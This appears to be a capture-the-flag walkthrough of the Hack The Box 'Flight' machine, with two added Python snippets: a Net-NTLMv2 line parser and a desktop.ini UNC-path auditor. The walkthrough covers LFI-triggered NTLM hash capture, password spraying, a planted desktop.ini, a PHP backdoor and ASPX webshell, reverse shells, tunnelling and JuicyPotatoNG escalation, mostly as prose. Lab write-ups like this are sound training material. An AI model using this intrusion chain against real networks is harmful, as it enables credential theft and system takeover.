In this post, I would like to share a walkthrough of the Flight machine from Hack The Box.

This machine is rated Hard on Hack The Box.

What will you gain from the Flight machine?

For the user flag, you will need to capture Net-NTLMv2 hashes, and we should be able to recover a plaintext password from them with hashcat. I will be using crackmapexec to run a password spray and locate another user who reuses the same password. We also get write access to a share, which lets us drop a malicious file on the SMB share.

As for the root flag, you need to authenticate on the network as the machine account. We can upload a simple ASPX webshell to execute commands, which gives us a shell connection back to our machine, and then use JuicyPotatoNG to obtain a root shell.

Information Gathering on Flight Machine

Once we have started the VPN connection (the configuration is downloaded from Hack The Box), we can start information gathering on the machine by running nmap -sC -sV -p- <IP Address> -Pn

Let’s access the website interface.

The website looks like an airline website.

Let’s enumerate directories using gobuster, but nothing looks interesting at all.

As a result, let’s enumerate subdomains that might help us with further escalation.

Let’s look at the subdomain of the website. It looks like nothing special, but the language seems to be “Latin”.

When trying to access the “About Us” page, it looks like it might be vulnerable to a Local File Inclusion attack.

Therefore, let’s test it by entering “index.php”, and the page looks a little bit off.

The website blocks the request with a “Suspicious Activity Blocked” message.

As a result, let’s start our Responder so that we can retrieve

We also need to start our smbserver, as shown above.

Let’s retrieve the hash by executing the command above.

Finally, we managed to retrieve the hash as expected.

Using hashcat, we managed to recover the password from the hash.
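What Responder writes out is a full NTLMv2 challenge-response, not a password hash: NTProofStr is an HMAC keyed by a password-derived key over the server challenge and the client blob, which is why it can be attacked offline. The following added example (not from the post; the sample line is constructed in code, not a real capture) decodes a hashcat-format line per MS-NLMP, exposing the timestamp and the NetBIOS/DNS names in the AV pairs that a defender uses to correlate a capture with the victim's authentication logs.

```python
import struct
from datetime import datetime, timezone

# AvId values from MS-NLMP section 2.2.2.1 (AV_PAIR)
AV_NAMES = {1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName",
            3: "MsvAvDnsComputerName", 4: "MsvAvDnsDomainName",
            5: "MsvAvDnsTreeName", 6: "MsvAvFlags", 7: "MsvAvTimestamp",
            9: "MsvAvTargetName", 10: "MsvAvChannelBindings"}
TEXT_AV_IDS = (1, 2, 3, 4, 5, 9)
EPOCH_DIFF = 116444736000000000  # FILETIME ticks between 1601-01-01 and 1970-01-01


def filetime_to_iso(ticks):
    """Convert a Windows FILETIME (100 ns ticks since 1601) to an ISO UTC string."""
    return datetime.fromtimestamp((ticks - EPOCH_DIFF) / 10_000_000,
                                  tz=timezone.utc).isoformat()


def parse_av_pairs(data):
    """Decode the AV_PAIR list: <AvId u16><AvLen u16><Value>, ended by AvId 0."""
    pairs, pos = {}, 0
    while pos + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, pos)
        pos += 4
        if av_id == 0:  # MsvAvEOL
            break
        value = data[pos:pos + av_len]
        pos += av_len
        name = AV_NAMES.get(av_id, f"AvId{av_id}")
        pairs[name] = value.decode("utf-16-le") if av_id in TEXT_AV_IDS else value.hex()
    return pairs


def parse_netntlmv2(line):
    """Parse 'user::domain:server_challenge:ntproofstr:blob' (hashcat mode 5600)."""
    user, _, domain, challenge, proof, blob_hex = line.strip().split(":")
    blob = bytes.fromhex(blob_hex)
    # Blob starts with RespType/HiRespType 0x01 0x01; challenge is 8 bytes, proof 16.
    if blob[:2] != b"\x01\x01" or len(challenge) != 16 or len(proof) != 32:
        raise ValueError("not a well-formed NetNTLMv2 line")
    ts, = struct.unpack_from("<Q", blob, 8)        # bytes 8..15: client timestamp
    return {"user": user, "domain": domain,
            "server_challenge": challenge, "ntproofstr": proof,
            "timestamp_utc": filetime_to_iso(ts),
            "client_challenge": blob[16:24].hex(),  # bytes 16..23
            "av_pairs": parse_av_pairs(blob[28:])}  # AV pairs start at byte 28


def build_sample_line():
    """Constructed sample (placeholder names/values, not a real capture)."""
    ts = struct.pack("<Q", 1667649600 * 10_000_000 + EPOCH_DIFF)  # 2022-11-05 12:00 UTC
    av = b""
    for av_id, text in ((2, "EXAMPLE"), (1, "DC01"), (4, "example.test"), (3, "dc01.example.test")):
        value = text.encode("utf-16-le")
        av += struct.pack("<HH", av_id, len(value)) + value
    av += struct.pack("<HH", 0, 0)
    blob = b"\x01\x01" + b"\x00" * 6 + ts + b"\x11" * 8 + b"\x00" * 4 + av + b"\x00" * 4
    return "svc_user::EXAMPLE:" + "aa" * 8 + ":" + "bb" * 16 + ":" + blob.hex()
```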

Using Crackmapexec for Flight machine from our attacker’s machine

My operating system doesn’t have crackmapexec for some reason, so let’s install it on our machine. Sadly, the tool cannot be installed at all.

After a while of troubleshooting, I gave up on using crackmapexec on Parrot OS and switched to Kali Linux for this activity only.

The screenshot above shows the crackmapexec process; now let’s move back to our Parrot OS machine.

The command above shows the shares that the user has access to on the machine.

From the result, let’s access one of the shares that svc_apache has permission to read.

Let’s access the Shared share using S.Moon’s credentials, and we see nothing.

Using impacket-smbexec, we can find out which share is writable: it is Shared. However, there seems to be customized code on the server that prevents a lot of file types from being written to it.

As a result, we can create a fake desktop.ini file and upload it to the server via smbclient.

Therefore, we upload the file by running the command “put desktop.ini”.
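The filter on Shared blocks many file types but lets desktop.ini through, and that is exactly the file a share audit should inspect: Explorer resolves paths in it when the folder is viewed, so an entry pointing off-host makes every visitor's client authenticate to that host. Added example (not from the post): it walks a share's local path, parses each desktop.ini, and flags values that reference a UNC path; the two-folder layout and the host name in it are constructed placeholders in a temporary directory.

```python
import configparser
import os
import tempfile
from pathlib import Path

UNC_PREFIX = "\\\\"  # a value starting with \\ names a remote host


def unc_references(ini_path):
    """Return (section, key, value) triples in a desktop.ini that point at a UNC path.
    An unparsable file is reported too, since it still deserves a manual look."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        parser.read(ini_path, encoding="utf-8-sig")  # real files may also be UTF-16
    except (configparser.Error, UnicodeDecodeError):
        return [("<unparsable>", "", "")]
    hits = []
    for section in parser.sections():
        for key, value in parser.items(section):  # keys are lower-cased by configparser
            if value.strip().startswith(UNC_PREFIX):
                hits.append((section, key, value.strip()))
    return hits


def audit_share(root):
    """Walk a share's local path; map each suspicious desktop.ini to its UNC entries."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower() == "desktop.ini":
                path = Path(dirpath) / name
                refs = unc_references(path)
                if refs:
                    findings[path.relative_to(root).as_posix()] = refs
    return findings


def demo():
    """Constructed share: a benign desktop.ini (local icon) and a planted one (remote)."""
    with tempfile.TemporaryDirectory() as root:
        benign = Path(root) / "docs"
        benign.mkdir()
        (benign / "desktop.ini").write_text(
            "[.ShellClassInfo]\nIconResource=C:\\Windows\\System32\\shell32.dll,3\n")
        planted = Path(root) / "reports"
        planted.mkdir()
        (planted / "desktop.ini").write_text(   # placeholder host, constructed sample
            "[.ShellClassInfo]\nIconResource=\\\\placeholder-host.example\\share\\icon.ico\n")
        return audit_share(root)
```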

When a user opens the share, their client follows the path in our desktop.ini back to our host and Responder captures a new hash. We crack it and get C.Bum’s password.

By using a similar method, we added a simple_backdoor.php on the machine via c.bum’s access.

The content of the file would be something like the above.

Let’s start our Python server.

We managed to transfer the file to the server using the Python server

Finally, we have successfully obtained access to the machine via the reverse shell connection.

Again, we need to start our Python server, this time on a different port.

Then, let’s start our nc listener.

As a result, the file “RunasCS.exe” has been downloaded onto the machine.

Let’s run the command above to retrieve the reverse shell connection.

Finally, we have succeeded in obtaining the connection back to us.

Access with c.bum privileges

We can read the user flag by using the command “type user.txt”.

Escalate to Admin Privileges Access on Flight Machine

Let’s check which ports are listening on the server.

Let’s transfer chisel to the victim’s machine.

On the attacker’s machine, we need to execute the command above.

On the other side, we are required to execute the command above.

The website will look something as shown in the screenshot above.

Let’s find a webshell on the internet.

As a result, we need to upload cmdasp.aspx to the victim’s machine.

We need to transfer the file to c:\inetpub\development\

We can verify that the file is stored there by looking inside the directory.

As another step to ensure that cmdasp works, we execute certutil.exe.

Uwu! It works as I expected

Let’s start our nc listener.

Let’s enter the command so that we will be able to obtain the reverse shell connection.

Therefore, let’s upload nc.exe onto the victim’s machine.

Let’s use a different cmd interface.

It looks like it works but the connection dies after a while.

After a few tries, we finally managed to retrieve the reverse shell connection.

From the privilege information shown in the screenshot above, we can see that the current account’s privileges make the machine vulnerable to JuicyPotato.

As a result, let’s download JuicyPotatoNG onto the victim’s machine.

To obtain nt authority\system privileges, we need to execute the command above.

Boom! The process succeeded.

We can read the root flag by typing the command “type root.txt”.
